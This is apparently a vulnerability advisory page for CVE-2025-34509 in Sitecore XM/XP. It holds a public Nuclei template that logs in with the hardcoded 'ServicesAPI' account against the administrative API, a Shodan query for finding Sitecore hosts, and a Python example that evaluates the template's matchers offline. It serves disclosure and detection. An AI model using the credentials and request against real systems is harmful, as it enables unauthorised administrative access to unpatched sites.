CVE-2025-34509: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials

Date: 2025-08-01 | Affected software: Sitecore Experience Manager (XM) and Experience Platform (XP) | PoC: public

Vulnerability description

Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated remote attackers can use this account to access the administrative API over HTTP.

PoC code [public]

id: CVE-2025-34509

info:
  name: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials
  author: daffainfo
  severity: high
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated and remote attackers can use this account to access administrative API over HTTP.
  reference:
    - https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34509
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-34509
    epss-score: 0.26732
    epss-percentile: 0.96131
    cwe-id: CWE-798
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*,cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_commerce,experience_platform
    shodan-query: title:"sitecore"
  tags: cve,cve2025,sitecore,experience_commerce,experience_platform,vkev

http:
  - raw:
      - |
        POST /sitecore/api/ssc/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"domain":"sitecore","username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - ServicesAPI
      password:
        - b

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie'
          - '.AspNet.Cookies='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d48b8e677ad0e774f2109a2bcf4a11dae02f30af2b19941ce604acd2330d6a69022100dc7a6cca473ad804e87b672fe0d62aa499d71857a75558a5872d4dcae1877684:922c64590222798bb761d5b6d8e72950
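How the template above decides that a host is affected, as an added Python example (it is not part of the template, nor code from its author or from Sitecore): it re-implements the two matchers, `word` on the header part with `condition: and` and `status`, joined by `matchers-condition: and`, and evaluates them offline against constructed HTTP responses. The same logic lets a defender confirm, after remediating per the Sitecore KB referenced above, that a login attempt with the hardcoded account no longer produces a 200 carrying an `.AspNet.Cookies` session cookie. All response samples below are constructed for illustration, not captured from a real instance.

```python
"""Offline evaluation of the Nuclei matcher logic used in the PoC template.

Added example; the HTTP responses are constructed samples, not real captures.
"""
from typing import List, Tuple

# Matcher configuration taken from the template above.
HEADER_WORDS: List[str] = ["Set-Cookie", ".AspNet.Cookies="]  # type: word, part: header, condition: and
EXPECTED_STATUS: List[int] = [200]                             # type: status


def split_raw_response(raw: str) -> Tuple[int, str, str]:
    """Split a raw HTTP/1.1 response into (status code, header block, body).

    The header block keeps its original case because Nuclei word matchers are
    case-sensitive unless `case-insensitive: true` is set (it is not here).
    """
    head, _, body = raw.partition("\r\n\r\n")
    status_line, _, header_block = head.partition("\r\n")
    status_code = int(status_line.split(" ", 2)[1])
    return status_code, header_block, body


def word_matcher_header(header_block: str, words: List[str]) -> bool:
    """`type: word`, `part: header`, `condition: and`: every word must appear."""
    return all(word in header_block for word in words)


def status_matcher(status_code: int, allowed: List[int]) -> bool:
    """`type: status`: the response code must be one of the listed values."""
    return status_code in allowed


def template_matches(raw: str) -> bool:
    """`matchers-condition: and`: both matchers must fire for a hit."""
    status_code, header_block, _ = split_raw_response(raw)
    return word_matcher_header(header_block, HEADER_WORDS) and status_matcher(
        status_code, EXPECTED_STATUS
    )


# Constructed sample: login accepted, session cookie issued (what the PoC looks for).
ACCEPTED_LOGIN = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    "Set-Cookie: .AspNet.Cookies=CONSTRUCTED_SAMPLE_TOKEN; path=/; HttpOnly\r\n"
    "\r\n"
    "{}"
)

# Constructed sample: login rejected outright.
REJECTED_LOGIN = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    "\r\n"
    '{"error":"constructed sample"}'
)

# Constructed sample: 200 but no session cookie, so the word matcher must block the hit.
OK_WITHOUT_COOKIE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    "\r\n"
    "{}"
)


def classify(raw: str) -> str:
    """Human-readable verdict for a captured login response."""
    return "affected: hardcoded account accepted" if template_matches(raw) else "no match"


if __name__ == "__main__":
    for label, sample in [("accepted", ACCEPTED_LOGIN), ("rejected", REJECTED_LOGIN), ("ok-no-cookie", OK_WITHOUT_COOKIE)]:
        print(f"{label:13s} -> {classify(sample)}")
```

Only the first sample satisfies both matchers; a 200 without the session cookie, or any non-200 response, is not reported, which mirrors how the template avoids flagging a host that merely answers the login endpoint.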